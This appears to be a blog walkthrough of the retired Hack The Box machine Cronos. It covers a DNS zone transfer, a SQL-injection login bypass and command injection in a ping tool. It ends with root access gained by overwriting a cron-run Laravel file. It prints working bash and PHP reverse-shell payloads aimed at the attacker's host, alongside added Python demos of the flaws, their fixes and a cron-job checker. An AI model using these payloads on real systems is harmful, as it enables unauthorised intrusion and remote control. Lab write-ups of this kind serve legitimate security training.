HTB Walkthrough: Cronos w/o Metasploit (retired)

Shraddha M.
3 min read · Jun 7, 2021

Cronos is a retired box on HTB and is on TJ Null's list of OSCP-like boxes.

Hostname: Cronos | Difficulty Level: Medium | Operating System: Linux

NMAP Scan

┌──(root💀kali)-[/home/kali/labs/HTB/Cronos]
└─# nmap -sC -sV -oA Cronos 10.10.10.13
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-03 18:49 EDT
Nmap scan report for 10.10.10.13
Host is up (0.021s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

┌──(root💀kali)-[/home/kali/labs/HTB/Cronos]
└─# dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.13-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 20 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Sat Jun 05 10:25:58 EDT 2021
;; XFR size: 7 records (messages 1, bytes 203)

The zone transfer succeeds because the BIND server on port 53 allows AXFR from any client. Add the newly found hostnames (cronos.htb, admin.cronos.htb, www.cronos.htb, ns1.cronos.htb) to /etc/hosts, all pointing at 10.10.10.13. The page source of www.cronos.htb hints that the site is built on the Laravel framework.
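To turn the zone transfer into /etc/hosts entries without retyping them, here is a small parser added as an example (it is not part of the original write-up). It is fed the records shown above as a constructed string, keeps only A records, and groups the names by IP so each IP becomes one hosts line:

```python
import re
from collections import defaultdict

# Constructed sample: the records returned by the dig axfr shown above.
AXFR_OUTPUT = """\
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
"""

# owner (trailing dot stripped), TTL, class IN, type A, dotted-quad address
A_RECORD = re.compile(r"^(\S+)\.\s+\d+\s+IN\s+A\s+(\d{1,3}(?:\.\d{1,3}){3})$")


def parse_axfr(text):
    """Return {ip: [names...]} for every A record in dig axfr output.
    Comment lines (';'), blank lines and non-A records (SOA, NS) are ignored;
    duplicate names for the same IP are dropped, order of first appearance kept."""
    hosts = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = A_RECORD.match(line)
        if not m:
            continue
        name, ip = m.group(1), m.group(2)
        if name not in hosts[ip]:
            hosts[ip].append(name)
    return dict(hosts)


def hosts_lines(text):
    """One /etc/hosts line per IP, names in zone order."""
    return [f"{ip} {' '.join(names)}" for ip, names in parse_axfr(text).items()]


if __name__ == "__main__":
    for line in hosts_lines(AXFR_OUTPUT):
        print(line)
```

Run it against real output with `dig axfr @10.10.10.13 cronos.htb | python3 axfr_hosts.py` style piping (reading stdin instead of the constant) and append the result to /etc/hosts.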

Browsing to http://admin.cronos.htb shows a login portal.
The username parameter is vulnerable to SQL injection. Refer to the 'Bypassing Login Screens' section of https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Entering admin' # in the username field (with any password) bypassed the login: the single quote closes the username string literal and # comments out the rest of the WHERE clause, so the password comparison is never evaluated (# is a line comment in MySQL, which is what is listening on local port 3306 later in the enumeration). We are redirected to http://admin.cronos.htb/welcome.php, which presents "Net Tool v0.1".
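The bypass explained above, as an added example that is not code from the box or from the original post. The table, column names and stored password are constructed guesses, and SQLite is used in place of MySQL so it runs offline; because SQLite only understands the `--` comment, the SQLite payload is spelled `admin' -- ` while the MySQL spelling the box accepted is `admin' #`. Both close the username literal and comment away the password check. The parameterised version beside it shows the fix:

```python
import sqlite3


def setup_db():
    # Constructed in-memory stand-in for the portal's user table; the real
    # schema and password on the box are not known from the write-up.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'not-the-real-password')")
    return conn


def build_vulnerable_query(username, password):
    # String concatenation: the mistake that turns a quote in the input into SQL syntax.
    return (f"SELECT username FROM users WHERE username='{username}' "
            f"AND password='{password}'")


def vulnerable_login(conn, username, password):
    """Returns the matched username, or None. Executes the concatenated query."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Parameterised equivalent: the driver binds the values, so a quote in
    the input is just a character inside a string, never SQL syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None


# '#' is a line comment in the MySQL family; SQLite only knows '--', so the
# same bypass is written with '-- ' here. Either way the resulting query is
# SELECT username FROM users WHERE username='admin' <comment...>
MYSQL_PAYLOAD = "admin' #"
SQLITE_PAYLOAD = "admin' -- "

if __name__ == "__main__":
    db = setup_db()
    print(build_vulnerable_query(MYSQL_PAYLOAD, "anything"))
    print("vulnerable login as:", vulnerable_login(db, SQLITE_PAYLOAD, "anything"))
    print("parameterised login as:", safe_login(db, SQLITE_PAYLOAD, "anything"))
```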

Exploitation

The portal is vulnerable to command injection: the host you submit is handed to a shell command without any sanitisation.

Refer to the 'Chaining commands' section of https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
To confirm it, enter 8.8.8.8; ls -la as the host and the directory listing of the web root comes back with the output. Once confirmed, start a netcat listener on port 9876 on Kali and submit the reverse shell below as the host value:

bash -c 'bash -i >& /dev/tcp/<Kali IP>/9876 0>&1'

This gives a reverse shell as www-data, from which the user flag can be read.
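The injection and its fix, as an added example (not the box's PHP and not the author's code). The vulnerable handler mirrors a Net Tool-style page that concatenates the submitted host into a shell string; `echo` stands in for the real ping so it runs offline, but the shell splits on `;` exactly the same way. The hardened version applies two independent fixes: it accepts only a literal IP address, and it never goes through a shell at all. The probe string is the one used on the box; the marker payload is constructed:

```python
import ipaddress
import subprocess


def ping_vulnerable(target):
    """Mirrors a handler that drops the submitted host straight into a shell
    string. 'echo' stands in for the real ping so this runs offline; the
    shell parses ';' identically either way, so a second command runs."""
    cmd = f"echo ping -c 1 {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def ping_hardened(target):
    """Two independent fixes: reject anything that is not a literal IPv4/IPv6
    address, and pass the value as its own argv element (no shell), so even a
    validation slip could not turn ';' or '|' into a command separator."""
    try:
        ipaddress.ip_address(target)
    except ValueError:
        raise ValueError(f"rejected target: {target!r}")
    return subprocess.run(["echo", "ping", "-c", "1", target],
                          capture_output=True, text=True).stdout


# Constructed inputs: the probe used on the box and a harmless marker payload
# (a reverse shell would sit in the same position after the ';').
PROBE = "8.8.8.8; ls -la"
MARKER = "8.8.8.8; echo INJECTED"

if __name__ == "__main__":
    print(ping_vulnerable(MARKER), end="")  # second line 'INJECTED' proves a second command ran
    print(ping_hardened("8.8.8.8"), end="")
    try:
        ping_hardened(PROBE)
    except ValueError as e:
        print(e)
```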

Privilege Escalation

Running the enumeration script linpeas.sh turns up an interesting cron job:

* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Two listeners bound to localhost only are also worth noting. 3306 is MySQL (the database behind the Laravel app, which is why # worked as a comment in the login bypass), not a Laravel port; 953 is the rndc control channel of the BIND server we already saw on port 53. Neither is reachable from outside the box.

tcp 0 0 127.0.0.1:3306
tcp 0 0 127.0.0.1:953

[+] Finding passwords inside key folders (limit 70) — no PHP files
/etc/acpi/powerbtn.sh: userhome=`getent passwd $user | cut -d: -f6`
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.

The password in default-ssl.conf is a comment from the stock Ubuntu Apache configuration, not a credential for this box; it is one of the rabbit holes.

The cron job runs /var/www/laravel/artisan as root every minute, and that file is writable by www-data, the user we already have a shell as. So anything we write into artisan executes as root within a minute. Overwrite it with a PHP reverse shell and start another netcat listener on Kali on port 9877:

echo "<?php \$sock=fsockopen(\"<Kali IP>\",9877);exec(\"/bin/bash -i <&3 >&3 2>&3\"); ?>" > /var/www/laravel/artisan

When the cron job next fires you get a root shell and the root flag.
Note: the payload does not have to be this particular PHP socket shell. Because cron invokes the file with php, it must stay a PHP file, but the body can just as well exec() a plain netcat or bash reverse shell. There are some rabbit holes on this box.
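The privilege-escalation check generalised, as an added example (not from the original post): given /etc/crontab or /etc/cron.d contents, it lists every job that runs as root and passes an absolute path that a non-root user could edit, which is exactly the condition that made artisan hijackable here. Ownership is compared against a `root_uid` parameter so that the constructed demo, which creates temporary files owned by whoever runs it, can treat the current user as the intended owner. The first cron line is the one linpeas reported on this box; the rest of the input is constructed:

```python
import os
import shutil
import stat
import tempfile

# Constructed input: the entry linpeas reported on this box, plus a stock
# Ubuntu entry and a comment to show what the parser skips.
CRON_LINES = """\
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
17 * * * * root cd / && run-parts --report /etc/cron.hourly
# m h dom mon dow user command
"""


def parse_system_crontab(text):
    """Yield (user, argv) for each job in /etc/crontab or /etc/cron.d format:
    five time fields, the user to run as, then the command line."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 7:
            continue
        yield fields[5], fields[6:]


def modifiable_by_non_owner(path, owner_uid):
    """True if a regular file at path is not owned by owner_uid or is
    group/world writable, i.e. someone other than the intended owner can
    replace its contents. Missing paths, directories and devices
    (/dev/null is world-writable but not a script) are not flagged."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    return st.st_uid != owner_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_hijackable_jobs(crontab_text, root_uid=0):
    """Return [(user, path)] for jobs that run as root and pass an absolute
    path (script, interpreter argument, config) a non-root user can edit."""
    findings = []
    for user, argv in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for arg in argv:
            if arg.startswith("/") and modifiable_by_non_owner(arg, root_uid):
                findings.append((user, arg))
    return findings


def demo():
    """Constructed scenario: a world-writable 'artisan' stand-in and a
    properly protected script, each invoked from a root cron line."""
    tmp = tempfile.mkdtemp()
    try:
        loose = os.path.join(tmp, "artisan")    # stands in for /var/www/laravel/artisan
        tight = os.path.join(tmp, "backup.sh")
        for p in (loose, tight):
            with open(p, "w") as f:
                f.write("#!/bin/sh\n")
        os.chmod(loose, 0o666)  # anybody can overwrite it
        os.chmod(tight, 0o644)  # only the owner can write
        crontab = (f"* * * * * root php {loose} schedule:run >> /dev/null 2>&1\n"
                   f"0 3 * * * root sh {tight}\n")
        # Treat the current user as the 'root' owner so the ownership test is meaningful here.
        return find_hijackable_jobs(crontab, root_uid=os.getuid())
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for user, path in demo():
        print(f"{user} job runs {path}, which a non-root user can modify")
```

On a real target run `find_hijackable_jobs(open("/etc/crontab").read())` with the default `root_uid=0`; an interpreter invoked by name (php, sh) is not itself checked, only the absolute paths handed to it, which is the case that matters for the artisan job.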
